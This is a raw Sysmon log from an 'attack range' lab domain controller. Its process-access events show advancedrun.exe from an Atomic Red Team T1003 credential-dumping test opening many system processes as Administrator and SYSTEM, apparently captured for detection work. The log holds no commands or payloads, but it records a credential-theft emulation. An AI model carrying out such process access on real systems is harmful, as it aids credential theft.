17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943994Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943993Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943992Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943991Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943990Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943989Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943988Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943986Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943985Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943984Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943983Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943982Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943981Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943980Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943979Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943978Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943977Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program 
